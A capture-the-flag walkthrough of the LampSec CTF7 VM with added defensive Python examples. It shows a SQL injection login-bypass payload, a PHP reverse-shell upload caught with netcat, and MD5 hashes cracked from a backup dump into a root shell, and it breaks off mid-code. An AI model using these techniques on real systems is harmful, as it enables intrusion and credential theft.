[vulnhub] LampSec-CTF7


Target deployment

This VM has its NIC configured as eth0, but the interface that actually exists is eth1. So we delete the configuration file /etc/sysconfig/network-scripts/ifcfg-eth0 and create a new one named ifcfg-eth1. The settings the file must contain are ONBOOT=yes, BOOTPROTO=dhcp and DEVICE=eth1 (the name of the NIC to configure). Then service network restart is all it takes. (That is for CentOS 6; on version 7 and later use systemctl instead.)
Actually, after that it is best to import the VM into VMware and choose "I moved it" rather than "I copied it"; that makes it much easier to keep the network configuration from breaking.

Information gathering

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 20:29 CST
Nmap scan report for 192.168.56.1
Host is up (0.0014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.56.2
Host is up (0.0010s latency).
MAC Address: 00:50:56:EC:CE:9E (VMware)
Nmap scan report for 192.168.56.141
Host is up (0.00089s latency).
MAC Address: 00:0C:29:AC:12:E4 (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.00060s latency).
MAC Address: 00:50:56:E6:06:A3 (VMware)
Nmap scan report for 192.168.56.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.02 seconds

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 20:30 CST
Nmap scan report for 192.168.56.141
Host is up (0.0011s latency).
Not shown: 65507 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:AC:12:E4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

Quite a few ports are open; 80, 8080, 139 and 10000 are all worth a look.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nmap -sU -p- --min-rate=10000 192.168.56.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 20:39 CST
Warning: 192.168.56.141 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.141
Host is up (0.0019s latency).
All 65535 scanned ports on 192.168.56.141 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:AC:12:E4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.81 seconds

20
21
22
23
24
25
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.56.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 20:47 CST
Nmap scan report for 192.168.56.141
Host is up (0.00058s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
10000/tcp open http MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:AC:12:E4 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.12 seconds

While the other scans are still running, let's take a look at port 80 first.

EXPLOIT

web

Start with directory discovery, and browse the site by hand while the scan runs.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo dirb http://192.168.56.141
[sudo] password for kali:

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue May 2 22:34:27 2023
URL_BASE: http://192.168.56.141/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

Clicking around, we find a few places that take input or allow registration, and port 8080 is a login page.
[image: sqli-1.png]
[image: sqli-2]
[image: sqli-login.png]

SQLi

Add a ' and see how it reacts.
[image: sqli-1-re.png]
[image: sqli-2-re.png]
OK, there is a SQL injection vulnerability. Later we can see whether sqlmap will dump the database for us.
Now let's try the login page.

# 192.168.56.141:8080
admin
') or 1=1 #-- -

And we are logged straight in.
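To show why that payload logs us in, and how the query should have been written, here is an added example (not code from the post or from the target application): a SQLite-backed login check that splices user input into the query text, beside a parameterized version of the same check. The table, the account and its password are constructed; the post's payload uses MySQL's # comment, and the example uses the -- - form that SQLite also accepts.

```python
import sqlite3

# Constructed payload. The post used "') or 1=1 #-- -" against MySQL; SQLite
# has no "#" comment syntax, so the equivalent "-- -" comment is used here.
PAYLOAD = "') or 1=1 -- -"

# Constructed account. Plaintext storage is itself a weakness; it is kept
# here only so that the query shape, not the hashing, is what differs.
SAMPLE_USER = ("admin", "s3cret-constructed")


def make_db():
    """Build an in-memory users table holding the constructed account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)", SAMPLE_USER)
    return con


def rendered_sql(username, password):
    """The statement a string-building login check hands to the database.

    The parentheses give the payload's leading ')' something to close: the
    injected text ends the group, ORs in an always-true condition and
    comments out the trailing quote and parenthesis.
    """
    return ("SELECT COUNT(*) FROM users WHERE (username = '%s' AND password = '%s')"
            % (username, password))


def vulnerable_login(con, username, password):
    """Login check that splices user input straight into the SQL text."""
    return con.execute(rendered_sql(username, password)).fetchone()[0] > 0


def safe_login(con, username, password):
    """Same check with bound parameters: the payload is compared as a literal
    password string and never reaches the SQL parser."""
    sql = "SELECT COUNT(*) FROM users WHERE (username = ? AND password = ?)"
    return con.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    print(rendered_sql("admin", PAYLOAD))
    print("vulnerable:", vulnerable_login(db, "admin", PAYLOAD))  # True
    print("parameterized:", safe_login(db, "admin", PAYLOAD))     # False
```

Printing rendered_sql shows the statement the server actually ran: the password field closed the quoted string and the parenthesised group, appended OR 1=1 and commented out the rest, so COUNT(*) is never zero. With placeholders the driver sends the payload as data, so the same input is simply a wrong password.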

File upload

OK, but I can't tell at a glance which CMS this is, so let's look for somewhere that lets us upload files.
[image: image.png]

Luckily we found a place to upload files.
[image: image.png]

We try to exploit the file upload.
[image: filter.png]

It seems that <? and ?> are filtered. However, even if we try to bypass the filter with <script language="php">payload</script>, the payload just doesn't execute.

As a result, we have to find the path of the uploaded shell.
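The filter the post ran into is a blocklist on file content, which is the wrong layer to defend at: the server decides what to execute by file name and location, not by whether the bytes contain <?. As an added example that is not part of the post or of the target application, the following contrasts that blocklist with an allowlist validator. The accepted types, the magic bytes and the sample inputs are constructed for the example.

```python
import secrets

# Allowlist of what this upload endpoint is meant to accept (constructed for
# the example): image types only, each tied to the magic bytes it must start with.
ALLOWED = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}


def naive_content_filter(data: bytes) -> bool:
    """The kind of check the post observed: accept anything that does not
    contain the PHP open/close tags. A blocklist on bytes says nothing about
    what the web server will do with the file once it is on disk."""
    return b"<?" not in data and b"?>" not in data


def validate_upload(filename: str, data: bytes):
    """Allowlist check: the extension must be an accepted image type, the bytes
    must carry that type's magic, and the stored name is generated rather than
    taken from the client. Returns the storage name, or None when rejected."""
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        return None
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return None
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    alt_tag = b'<script language="php">echo 1;</script>'   # constructed sample
    print(naive_content_filter(alt_tag))               # True: the blocklist misses it
    print(validate_upload("shell.php", alt_tag))       # None: extension not allowed
    print(validate_upload("pic.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16))  # random .png name
```

Even with this in place, the upload directory should be served with script execution disabled and preferably kept outside the document root, so that a validation mistake does not turn into code execution as it did here.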

Oh, and don't forget we ran web content discovery earlier, which has certainly finished by now. So let's take a look at it.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo dirb http://192.168.56.141
[sudo] password for kali:

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue May 2 22:34:27 2023
URL_BASE: http://192.168.56.141/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.141/ ----
+ http://192.168.56.141/about (CODE:200|SIZE:4910)
==> DIRECTORY: http://192.168.56.141/assets/
+ http://192.168.56.141/backups (CODE:301|SIZE:333)
+ http://192.168.56.141/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.56.141/contact (CODE:200|SIZE:5017)
==> DIRECTORY: http://192.168.56.141/css/
+ http://192.168.56.141/db (CODE:200|SIZE:3904)
+ http://192.168.56.141/default (CODE:200|SIZE:6058)
+ http://192.168.56.141/footer (CODE:200|SIZE:3904)
+ http://192.168.56.141/header (CODE:200|SIZE:3904)
==> DIRECTORY: http://192.168.56.141/img/
==> DIRECTORY: http://192.168.56.141/inc/
+ http://192.168.56.141/index.php (CODE:200|SIZE:6058)
==> DIRECTORY: http://192.168.56.141/js/
+ http://192.168.56.141/newsletter (CODE:200|SIZE:4037)
+ http://192.168.56.141/phpinfo (CODE:200|SIZE:58762)
+ http://192.168.56.141/profile (CODE:200|SIZE:3977)
+ http://192.168.56.141/read (CODE:302|SIZE:1)
+ http://192.168.56.141/recovery (CODE:200|SIZE:4807)
+ http://192.168.56.141/register (CODE:200|SIZE:6591)
+ http://192.168.56.141/signup (CODE:200|SIZE:4783)
+ http://192.168.56.141/usage (CODE:403|SIZE:287)
==> DIRECTORY: http://192.168.56.141/webalizer/
==> DIRECTORY: http://192.168.56.141/webmail/

---- Entering directory: http://192.168.56.141/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.141/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.141/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.141/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.141/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.141/webalizer/ ----
+ http://192.168.56.141/webalizer/index.html (CODE:200|SIZE:3671)

---- Entering directory: http://192.168.56.141/webmail/ ----
+ http://192.168.56.141/webmail/bin (CODE:403|SIZE:293)
+ http://192.168.56.141/webmail/config (CODE:403|SIZE:296)
+ http://192.168.56.141/webmail/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.56.141/webmail/index.php (CODE:200|SIZE:5157)
==> DIRECTORY: http://192.168.56.141/webmail/installer/
+ http://192.168.56.141/webmail/LICENSE (CODE:403|SIZE:297)
+ http://192.168.56.141/webmail/logs (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.56.141/webmail/plugins/
==> DIRECTORY: http://192.168.56.141/webmail/program/
+ http://192.168.56.141/webmail/README (CODE:403|SIZE:296)
+ http://192.168.56.141/webmail/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.56.141/webmail/skins/
+ http://192.168.56.141/webmail/SQL (CODE:403|SIZE:293)
+ http://192.168.56.141/webmail/temp (CODE:403|SIZE:294)

---- Entering directory: http://192.168.56.141/webmail/installer/ ----
==> DIRECTORY: http://192.168.56.141/webmail/installer/images/
+ http://192.168.56.141/webmail/installer/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.56.141/webmail/plugins/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/archive/
==> DIRECTORY: http://192.168.56.141/webmail/plugins/emoticons/
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/
==> DIRECTORY: http://192.168.56.141/webmail/plugins/password/
==> DIRECTORY: http://192.168.56.141/webmail/plugins/userinfo/

---- Entering directory: http://192.168.56.141/webmail/program/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.141/webmail/skins/ ----
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/

---- Entering directory: http://192.168.56.141/webmail/installer/images/ ----

---- Entering directory: http://192.168.56.141/webmail/plugins/archive/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/archive/skins/

---- Entering directory: http://192.168.56.141/webmail/plugins/emoticons/ ----

---- Entering directory: http://192.168.56.141/webmail/plugins/help/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/content/
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/skins/

---- Entering directory: http://192.168.56.141/webmail/plugins/password/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/password/drivers/
==> DIRECTORY: http://192.168.56.141/webmail/plugins/password/helpers/
+ http://192.168.56.141/webmail/plugins/password/README (CODE:200|SIZE:10645)

---- Entering directory: http://192.168.56.141/webmail/plugins/userinfo/ ----

---- Entering directory: http://192.168.56.141/webmail/skins/classic/ ----
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/images/
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/includes/
+ http://192.168.56.141/webmail/skins/classic/README (CODE:200|SIZE:855)
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/templates/

---- Entering directory: http://192.168.56.141/webmail/plugins/archive/skins/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/archive/skins/classic/

---- Entering directory: http://192.168.56.141/webmail/plugins/help/content/ ----

---- Entering directory: http://192.168.56.141/webmail/plugins/help/skins/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/skins/classic/

---- Entering directory: http://192.168.56.141/webmail/plugins/password/drivers/ ----

---- Entering directory: http://192.168.56.141/webmail/plugins/password/helpers/ ----

---- Entering directory: http://192.168.56.141/webmail/skins/classic/images/ ----
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/images/buttons/
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/images/display/
+ http://192.168.56.141/webmail/skins/classic/images/favicon.ico (CODE:200|SIZE:1150)
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/images/icons/

---- Entering directory: http://192.168.56.141/webmail/skins/classic/includes/ ----

---- Entering directory: http://192.168.56.141/webmail/skins/classic/templates/ ----

---- Entering directory: http://192.168.56.141/webmail/plugins/archive/skins/classic/ ----

---- Entering directory: http://192.168.56.141/webmail/plugins/help/skins/classic/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/skins/classic/templates/

---- Entering directory: http://192.168.56.141/webmail/skins/classic/images/buttons/ ----

---- Entering directory: http://192.168.56.141/webmail/skins/classic/images/display/ ----

---- Entering directory: http://192.168.56.141/webmail/skins/classic/images/icons/ ----

---- Entering directory: http://192.168.56.141/webmail/plugins/help/skins/classic/templates/ ----
/zt
-----------------
END_TIME: Tue May 2 22:39:31 2023
DOWNLOADED: 124624 - FOUND: 32

After some manual trying, we find that uploaded files land under 192.168.56.141/assets/.
So we upload php-reverse-shell.
[image: image.png]
And we curl our shell.php

# curl http://192.168.56.141/assets/shell.php
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nc -lvp 443
[sudo] password for kali:
listening on [any] 443 ...
192.168.56.141: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.132] from (UNKNOWN) [192.168.56.141] 48031
Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
17:37:14 up 2:45, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.1$ whoami
whoami
apache
sh-4.1$ pwd
/
pwd
sh-4.1$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:ac:12:e4 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.141/24 brd 192.168.56.255 scope global eth1
inet6 fe80::20c:29ff:feac:12e4/64 scope link
valid_lft forever preferred_lft forever

Successfully got a web shell.

Privilege Escalation

First spawn a more stable shell with python.
Then: sudo -l asks for a password, find turns up no usable SUID binaries, and cat /etc/crontab shows no scheduled jobs at all. OK.
Fine, before bringing out the big guns, let's do some manual enumeration.

uname -a
Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux

The kernel is pretty old, the classic 2.6, so a kernel exploit is an option, but let's push that down the priority list.

Checking configuration files

cd into /home and there are plenty of users, but we have no read permission, so that's no use; we can't check whether any of them left login credentials lying around.
So let's look at the site's configuration files instead and hunt for the passwords used to connect the front end to the back end.

bash-4.1$ cat config.inc.php
cat config.inc.php
<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 3.5.4 setup script
* Date: Wed, 19 Dec 2012 09:01:38 -0500
*/

/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['nopassword'] = true;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
$cfg['Servers'][$i]['AllowNoPasswordRoot'] = TRUE;

/* End of servers configuration */

$cfg['blowfish_secret'] = '50d1c8ba084fd9.39888691';
$cfg['DefaultLang'] = 'en';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';

From the site's config file we can see that the database root user logs in with no password at all. So later I can log in to the database and dig for information.

Sensitive information disclosure

Walking the web directories by hand again, we find that the /backups directory we couldn't get into before contains a backup file. Looking at it, the last few lines happen to record the INSERT of user accounts, password hashes and other details into the database.

/* /var/www/html/backups */
LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES ('webdev@localhost.localdomain','f7aa6066f95255096672e3a5fc537081',1,NULL,13,'Developer account','Developer account for updating the site.'),('brian@localhost.localdomain','d41d8cd98f00b204e9800998ecf8427e',1,'2012-12-19 11:30:54',3,'Brian Hershel','Brian is our technical brains behind the operations and a chief trainer.'),('john@localhost.localdomain','0d9ff2a4396d6939f80ffe09b1280ee1',1,NULL,4,'John Durham',''),('alice@localhost.localdomain','2146bf95e8929874fc63d54f50f1d2e3',1,NULL,5,'Alice Wonder',''),('ruby@localhost.localdomain','9f80ec37f8313728ef3e2f218c79aa23',0,NULL,6,'Ruby Spinster',''),('leon@localhost.localdomain','5d93ceb70e2bf5daa84ec3d0cd2c731a',0,NULL,7,'Leon Parnetta',''),('julia@localhost.localdomain','ed2539fe892d2c52c42a440354e8e3d5',0,NULL,8,'Julia Fields',''),('michael@localhost.localdomain','9c42a1346e333a770904b2a2b37fa7d3',0,NULL,9,'Michael Saint',''),('bruce@localhost.localdomain','3a24d81c2b9d0d9aaf2f10c6c9757d4e',0,NULL,10,'Bruce Pottricks',''),('neil@localhost.localdomain','4773408d5358875b3764db552a29ca61',0,NULL,11,'Neil Felstein',''),('charles@localhost.localdomain','b2a97bcecbd9336b98d59d9324dae5cf',0,NULL,12,'Charles Adams','');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;

We extract the login credentials and throw the hashes at crackstation. Then we try the recovered passwords directly over ssh to see whether any of them log in.

brian:''   # it's just the md5 of an empty string, damn.
webdev:'webdev'
john:'transformersrule'

It worked on the third one, john.

bash-4.1$ su john
su john
Password: transformersrule

[john@localhost backups]$ whoami
whoami
john
[john@localhost backups]$ sudo -l
sudo -l
[sudo] password for john: transformersrule

Matching Defaults entries for john on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User john may run the following commands on this host:
(ALL) ALL
[john@localhost backups]$ sudo su
sudo su
[root@localhost backups]# whoami
whoami
root
[root@localhost backups]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:ac:12:e4 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.141/24 brd 192.168.56.255 scope global eth1
inet6 fe80::20c:29ff:feac:12e4/64 scope link
valid_lft forever preferred_lft forever

He's directly in the sudo group, so privilege escalation succeeds immediately.

Password reuse

Of course, we can also log in to the MySQL database to view the users and their password hashes.

#mysql -uroot
#show databases;
#use users;
#select * from users;
mysql> select username,password from users;
select username,password from users;
+-------------------------------+----------------------------------+
| username | password |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| 1@1.com | c4ca4238a0b923820dcc509a6f75849b |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
13 rows in set (0.00 sec)

After massaging these credentials with sed/awk, throw the hashes straight into hashcat.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ hashcat -a 0 -m 0 passhash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz, 2913/5890 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs

ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: passhash
Time.Started.....: Wed May 3 14:34:10 2023 (6 secs)
Time.Estimated...: Wed May 3 14:34:16 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2728.7 kH/s (0.22ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 8/12 (66.67%) Digests (total), 8/12 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 28%

Started: Wed May 3 14:33:41 2023
Stopped: Wed May 3 14:34:17 2023
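Both the backup file above and the mysql table output hand us unsalted MD5 digests, which is why crackstation and a few seconds of hashcat recover most of them. As an added example that is not part of the post, the following parses both formats (an excerpt of each, embedded as sample input), checks the digests against a small constructed wordlist instead of rockyou, and contrasts the result with a salted, iterated hash of the kind the application should have stored. The parser functions, the wordlist and the PBKDF2 parameters are assumptions of the example.

```python
import hashlib
import hmac
import os
import re

# Sample inputs: an excerpt of the backup's INSERT statement (two accounts, as
# printed on the page) and an excerpt of the mysql table output, embedded here
# so the parsers can run offline.
DUMP_LINE = (
    "INSERT INTO `users` VALUES ('brian@localhost.localdomain',"
    "'d41d8cd98f00b204e9800998ecf8427e',1,'2012-12-19 11:30:54',3,"
    "'Brian Hershel','Brian is our technical brains behind the operations and a chief trainer.'),"
    "('john@localhost.localdomain','0d9ff2a4396d6939f80ffe09b1280ee1',1,NULL,4,'John Durham','');"
)

TABLE_OUTPUT = """\
+-------------------------------+----------------------------------+
| username | password |
+-------------------------------+----------------------------------+
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
| 1@1.com | c4ca4238a0b923820dcc509a6f75849b |
+-------------------------------+----------------------------------+
"""

# Constructed stand-in for a wordlist; the post used rockyou.txt with hashcat.
WORDLIST = ["", "test", "1", "password", "letmein"]

ROW_RE = re.compile(r"\('([^']*)','([0-9a-f]{32})'")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_insert_dump(text):
    """(user, md5hex) pairs from an INSERT ... VALUES (...),(...) statement.
    Only tuples whose second column is a 32-hex-digit string are taken."""
    return [(email.split("@")[0], h) for email, h in ROW_RE.findall(text)]


def parse_mysql_table(text):
    """(user, md5hex) pairs from the mysql client's ASCII table output."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 2 and MD5_RE.match(cells[1]):
            rows.append((cells[0].split("@")[0], cells[1]))
    return rows


def dictionary_check(creds, wordlist):
    """Unsalted MD5: one digest per candidate word serves every account at once.
    Returns {user: recovered password or None}."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup.get(h) for user, h in creds}


def salted_hash(password, salt=None, rounds=200_000):
    """PBKDF2-HMAC-SHA256 with a per-user random salt, stored as salt$digest.
    Every account now costs the attacker a separate, slow computation."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
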